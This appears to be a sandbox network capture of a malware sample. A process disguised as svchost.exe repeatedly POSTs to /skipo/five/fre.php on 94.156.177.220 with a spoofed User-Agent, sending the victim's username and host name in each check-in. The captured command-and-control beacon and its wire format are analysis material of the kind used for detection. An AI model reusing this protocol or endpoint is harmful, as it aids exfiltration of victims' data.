Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49882	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:48.447721958 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:48.455794096 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:49.446065903 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49889	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:49.607281923 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:49.612677097 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:50.556979895 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49895	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:50.708364964 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:50.713924885 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:51.655670881 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49901	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:51.820003033 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:51.825406075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:52.780123949 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49912	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:52.940668106 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:52.946537018 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:53.905054092 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49918	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:54.057336092 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:54.062937021 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:55.022402048 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49924	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:55.178208113 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:55.183722019 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:56.154295921 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49931	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:56.302401066 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:56.307812929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:57.274689913 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49940	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:57.441044092 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:57.446376085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:58.414819002 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49947	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:58.574897051 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:58.580399036 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:59.541858912 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49953	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:59.702009916 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:59.707698107 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:00.670557976 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49964	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:01.131556988 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:01.137132883 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:02.093803883 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49970	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:02.261420965 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:02.266872883 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:03.219717979 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49976	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:03.595834970 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:03.602216005 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:04.561626911 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49982	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:04.721762896 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:04.727180958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:05.696372986 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49992	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:05.860179901 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:05.865657091 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:06.826184034 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49998	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:06.989087105 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:06.994667053 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:07.968955994 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50005	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:08.128511906 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:08.135076046 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:09.108057022 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50015	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:09.281228065 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:09.286645889 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:10.281275988 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50019	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:10.437654972 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:10.443346024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:11.421158075 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50027	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:11.582879066 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:11.588270903 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
